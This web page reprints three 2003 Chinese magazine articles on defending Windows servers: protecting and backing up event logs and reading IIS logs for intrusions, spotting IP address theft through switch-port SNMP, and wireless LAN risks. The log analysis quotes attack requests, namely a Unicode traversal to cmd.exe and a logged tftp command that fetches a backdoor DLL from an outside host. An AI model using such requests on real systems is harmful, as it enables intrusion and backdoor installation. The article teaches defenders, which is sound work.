返回IT运维网
  • |
  • 文章EID:
  • |
  • 账号:
  • 密码:
Windows“黑匣子”的保护和分析(图)
2003-11-01 本网 / 科海电子出版社 徐建军

本文出自《网管员世界》2003年第11期 |安全空间| 栏目

Windows系统以它的易用性倍受网管员的青睐,国内相当部分的大型网站都是用Windows 2000/XP系统建立的。Windows系统使用的人多了,研究它安全的人也多了。在此我要提醒一下网管们,虽然你补上了所有的安全补丁,但是谁又知道新的漏洞何时又会被发现呢?所以也应该做好系统日志的保护工作。
作为黑客,他们也是最关心系统日志的,一旦他们入侵成功,要做的第一件事就是删除你的日志文件,使你在被入侵后无法追踪黑客行为,以及检查黑客所做的操作行为。日志文件就像飞机中的“黑匣子”一样重要,因为里面保存着黑客入侵行为的所有罪证。

日志的移位与保护

Windows 2000的系统日志文件包括:应用程序日志、安全日志、系统日志、DNS服务日志,以及FTP连接日志和HTTPD日志等。在默认情况下日志文件大小为512KB,日志保存的默认的位置如下:
安全日志文件:%systemroot%system32config SecEvent.EVT
系统日志文件:%systemroot%system32config SysEvent.EVT
应用程序日志文件:%systemroot%system32config AppEvent.EVT
FTP连接日志和HTTPD事务日志:%systemroot% system32LogFiles,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
在此笔者把系统默认为.EVT扩展名的日志文件统称为事件日志,笔者看了好多文章介绍对事件日志移位能做到很好的保护。移位虽是一种保护方法,但只要在命令行输入dir c:*.evt/s(如系统安装在D盘,则盘符为D),一下就可查找到事件日志位置。日志移位要通过修改注册表来完成,我们找到注册表HKEY_LOCAL_MACHINESYSTEM CurrentControlSet ServicesEventlog位置,下面的Application、Security、System几个子键,分别对应“应用程序日志”、“安全日志”、“系统日志”。如何修改注册表,下面我们来看看Application子键,如图1所示。

图1


File项就是“应用程序日志”文件存放的位置,把此键值改为我们要存放日志文件的文件夹,然后再把%systemroot%system32configappevent.evt文件拷贝到此文件夹,再重启机器。在此介绍移位的目的是为了充分利用Windows 2000在NTFS格式下的“安全”属性,如果不移位也无法对文件进行安全设置操作,右击移位后的文件夹选择“属性”,进入“安全”选项卡,不选择“允许将来自父系的可继承权限传播给该对象”,添加“System”组,分别给Everyone组“读取”权限,System组选择除“完全控制”和“修改”的权限。然后再将系统默认的日志文件512KB大小改为你所想要的大小,如20MB。
进行了上面的设置后,再直接通过Del C:*.Evt/s/q来删除是删不掉的;对系统正在使用的记录文件在命令行形式中用上面的命令也是拒绝操作的。

日志文件的备份

基于WMI技术的日志备份脚本
WMI(Windows Management Instrumentation)技术是微软提供的Windows下的系统管理工具,基于WMI开发的脚本均可在Windows 2000/NT上成功运行。微软提供了一个脚本,利用WMI将日志文件大小设为25MB,并允许日志自动覆盖14天前的日志。(编者按:限于篇幅,脚本就不刊登了,需要的读者朋友请自行到微软网站上查找,或向责编索要。)
我们只需把该脚本保存为.vbs扩展名的文件就可以使用,我们还可以修改上面的脚本来备份日志文件,笔者在此建议,在备份日志时一定将EVT的后缀名改为其他后缀保存(如.C),目的是让攻击者不易找到。

通过dumpel工具的备份
可用微软Resource Kit工具箱中的dumpel.exe工具备份日志文件,其格式为:
dumpel -f file [-s server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t] [-dx]
-s server 输出远程计算机日志,如果是本地,这个可以省略。
-f filename 输出日志的位置和文件名。
-l log log 可选为System,Security,Application,可能还有别的如DNS等。
如要把目标服务器Server上的系统日志转存为Systemlog.log可以用如下格式:
dumpel server -l system -f Systemlog.log
如果利用计划任务还可以实现定期备份系统日志。

HTTPD事务日志的分析

Microsoft的IIS 5自公布到现在,被黑客利用的漏洞是很多的,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我们备份日志的目的就是为了分析黑客入侵的行为,对于没有打好补丁包的系统被黑客成功入侵的日志记录分别对应如下。

unicode漏洞入侵日志记录
我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%system32LogFiles文件夹下,如图2所示是一个典型的Unicode漏洞入侵行为的日志记录,对于正常的Web访问,是通过80端口用GET命令获取Web数据,但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此洞。

图2


如通过下面的编码查看目标机的目录文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
则日志中会记录下此访问行为:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
然而我们的日志中记录的一清二楚,是来自192.168.0.1的攻击者查看我们的目录。而下面一行是向我们的机器传送后门程序的记录:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll 502 -

WebDavx3远程溢出日志记录
最近在黑客界有名的Wevdavx3漏洞是应用最广泛的,连打了最新SP3补丁的系统也不放过。如果系统遭受了此远程溢出的攻击行为,则日志记录如图3所示。


图3

我们看到图中这样的一行信息:
2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……
就表示我们的Web服务受到了来自192.168.0.218的攻击,并锁定(即关闭)了WEB服务。后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。
上面都记录了入侵行为的IP地址,此IP地址并不能排除是攻击者使用了跳板,也就是说此IP很可能是“肉鸡”而不是攻击者的IP,但再查看其他日志文件,还是有可能追查出攻击者的位置。
不过笔者写到最后,还是想说一句,最好还是安装一个防火墙来记录和阻止黑客行为。
看好您的IP地址
——通过管理交换机端口来阻止IP地址盗用
■ 北京 高秀霞
目前IP地址盗用行为非常常见,许多“不法之徒”用盗用地址的行为来逃避追踪、隐藏自己的身份。IP地址的盗用行为侵害了网络正常用户的权益,并且给网络安全、网络的正常运行带来了巨大的负面影响,因此研究IP地址盗用的问题,找出有效的防范措施,是当前的一个紧迫课题。

IP地址盗用常用的方法及其防范机制

IP地址盗用是指盗用者使用未经授权的IP地址来配置网上的计算机。IP地址的盗用通常有以下两种方法:
一是单纯修改IP地址的盗用方法。如果用户在配置或修改配置时,使用的不是合法获得的IP地址,就形成了IP地址盗用。由于IP地址是一个协议逻辑地址,是一个需要用户设置并随时修改的值,因此无法限制用户修改本机的IP地址。
二是同时修改IP-MAC地址的方法。针对单纯修改IP地址的问题,很多单位都采用IP-MAC捆绑技术加以解决。但IP-MAC捆绑技术无法防止用户对IP-MAC的修改。MAC地址是网络设备的硬件地址,对于以太网来说,即俗称的网卡地址。每个网卡上的MAC地址在所有以太网设备中必须是惟一的,它由IEEE分配,固化在网卡上一般不得随意改动。但是,一些兼容网卡的MAC地址却可以通过配置程序来修改。如果将一台计算机的IP和MAC地址都修改为另一台合法主机对应的IP和MAC地址,那么IP-MAC捆绑技术就无能为力了。另外,对于一些MAC地址不能直接修改的网卡,用户还可以通过软件修改MAC地址,即通过修改底层网络软件达到欺骗上层软件的目的。
目前发现IP地址盗用比较常用的方法是定期扫描网络各路由器的ARP(address resolution protocol)表,获得当前正在使用的IP地址以及IP-MAC对照关系,与合法的IP地址表,IP-MAC表对照,如果不一致则有非法访问行为发生。另外,从用户的故障报告(盗用正在使用的IP地址会出现MAC地址冲突的提示)也可以发现IP地址的盗用行为。在此基础上,常用的防范机制有:IP-MAC捆绑技术、代理服务器技术、IP-MAC-USER认证授权以及透明网关技术等。
这些机制都有一定的局限性,比如IP-MAC捆绑技术用户管理十分困难;透明网关技术需要专门的机器进行数据转发,该机器容易成为瓶颈。更重要的是,这些机制都没有完全从根本上防止IP地址盗用行为所产生的危害,只是防止地址盗用者直接访问外部网络资源。事实上,由于IP地址盗用者仍然具有IP子网内完全活动的自由,因此一方面这种行为会干扰合法用户的使用:另一方面可能被不良企图者用来攻击子网内的其他机器和网络设备。如果子网内有代理服务器,盗用者还可以通过种种手段获得网外资源。

利用端口定位及阻断IP地址盗用

交换机是局域网的主要网络设备,它工作在数据链路层上,基于MAC地址来转发和过滤数据包。因此,每个交换机均维护着一个与端口对应的MAC地址表。任何与交换机直接相连或处于同一广播域的主机的MAC地址均会被保存到交换机的MAC地址表中。通过SNMP(Simple Network Management protocol)管理站与各个交换机的SNMP代理通信可以获取每个交换机保存的与端口对应的MAC地址表,从而形成一个实时的Switch-Port-MAC对应表。将实时获得的Switch-Port-MAC对应表与事先获得的合法的完整表格对照,就可以快速发现交换机端口是否出现非法MAC地址,进一步即可判定是否有IP地址盗用的发生。如果同一个MAC地址同时出现在不同的交换机的非级联端口上,则意味着IP-MAC成对盗用。
发现了地址盗用行为后,实际上也已经将盗用行为定位到了交换机的端口。再通过查询事先建立的完整的Switch-Port-MAC对应表,就可以立即定位到发生盗用行为的房间。
发生了地址盗用行为后,可以立即采取相应的方法来阻断盗用行为所产生的影响,技术上可以通过SNMP管理站向交换机代理发出一个SNMP消息来关断发生盗用行为的端口,这样盗用IP地址的机器无法与网络中其他机器发生任何联系,当然也无法影响其他机器的正常运行。
端口的关断可以通过改变其管理状态来实现。在MIB(Management Information Base)中有一个代表端口管理状态的可读写对象ifAdminStatus(对象标识符号为1.3.6.1.2.1.2.2.1.7),给ifAdminStatus赋不同的值,可以改变端口的管理状态,即“1”—开启端口,“2”—关闭端口,“3”—供测试用。
这样,通过管理站给交换机发送赋值信息(Set Request),就可以关闭和开启相应的端口,比如要关闭某一交换机(192.168.1.1)的2号端口,可以向该交换机发出如下信息:
set("private" 192.168.1.1 1.3.6.1,2.1.2.2.1.7.2.0.2).
结合IP-MAC绑定技术,通过交换机端口管理,可以在实际使用中迅速发现并阻断IP地址的盗用行为,尤其是解决了IP-MAC成对盗用的问题,同时也不影响网络的运行效率。

无线局域网:
招贼之处不少
■ 厦门 中英
无线局域网(WLAN)现在越来越广泛,但无线局域网络的安全存在一定的隐患,招贼之处不少,任意设置无线存取设备(AP;Access Point)以及计算机间直接互通的Ad Hoc网络都是企业信息安全的大缺口。下面我们就去破解一番。

未经许可的AP
未经授权的无线存取设备(AP;Access Point)是今日信息泄漏最大的威胁。无管制的AP几乎连最基本的Wired Equivalent Privacy(WEP)加密功能都没有。此外,即使配有WEP,想要窃听者也能通过公司网络使用AirSnort和NetStumbler截取WLAN上的信息。公司必须立下规定处罚擅自架设AP者,侦查未受管制的AP是公司保护信息安全第一要加强的方面,采用多层级的保护方法才能防御所有侵入者。

未受管制的无线笔记本网络
未经许可的无线网络设备正通过各种无线科技进入企业。Intel新发售的迅驰Centrino无线芯片让所有新型Laptops都能配有WLAN的装置,这些都需要安全防护侦查功能。未经授权的WLAN站台必须有保护措施以保护使用者避免连接到来路不明的WLANs,或连接到黑客的计算机,引发计算机资料被窃取。一个被侵入的WLAN可能就是企业庞大计算机网络安全的缺口。

Ad Hoc网络
和无管制的AP一样,Ad Hoc无线网络的安全也令人忧心。因为网络管理者完全无法管制Laptops计算机的资料安全。WLAN卡允许笔记本之间即使没有AP也能够交换信息。这些Ad Hoc网络允许两台计算机自由转移信息。当WLAN卡以Ad Hoc模式操作时,使用者基本上是信任在电波范围之内的所有站台。Ad Hoc网络提供很少的鉴别管理和安全防护。恶意站台能够直接连接Ad Hoc网络上的用户,并且因此而可以连接至企业的网络。

当数据传输速率太慢时
一个802.11b WLAN应该可以提供企业用户5.5Mbps或11Mbps的传输流量,若只能提供慢速如1Mbps或2Mbps速度,即可能有黑客正在进行非法行为。

通过AP不经认证即允许进入虚拟企业网络(VPN)
有安全意识的企业会在VPN入口前鉴定所有使用者的身份。许多企业却未留意,让来自WLAN的使用者不须认证身份即允许进入VPN。

通过邻近AP感应连结
WLAN的RF信号不会仅局限在受限办公室之内,有可能计算机会无意间联机至邻近企业的WLAN,可能会因此泄漏密码或敏感文件给邻近的WLAN。

非标准的WLAN卡
企业建置的WLAN网络都是采购Wi-Fi标准设备,具备网络安全和管理功能。与未经认可的非标准WLAN卡和AP一样,都有泄密的可能。

SSID(Service Set Identifier,业务组标识符)泄密
SSID(Service Set Identifier,业务组标识符)反映出WLAN的性质和名称(SSIDs与其它WLAN信息流一同被公开地传播),所以企业应该小心不要在SSIDs泄漏信息。SSIDs应该避免使用部门名称,如Human Resources、Accounting或者Engineering等。如此可能会吸引黑客通过SSID到WLAN寻找员工档案、财务信息或技术信息。

不安全的Windows XP自动设定
WLAN安全政策应该落实到每个无线站台和装置,但有些Windows XP的自动设定却增加了安全上的风险。Laptops会主动侦查以便连接至附近的AP或不安全装置包括:自动连接所有未经认可的无线网络站台、发射信号寻找过去曾经连结过的AP,以及可以与其它Laptops直接沟通。

下班后的WLAN网络关闭
WLAN的RF信号能跨越建筑物,许多企业开始限制WLAN的使用仅于白天上班时间,以免黑客在夜晚伺机而动,因此在非工作期间关闭AP。

相关评论 [查看所有评论]
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
心情:
  • 支持
  • 高兴
  • 枪稿
  • 不解
  • 搞笑
  • 愤怒
  • 谎言
账号: 密码:
验证码 看不清?点击更换
相关阅读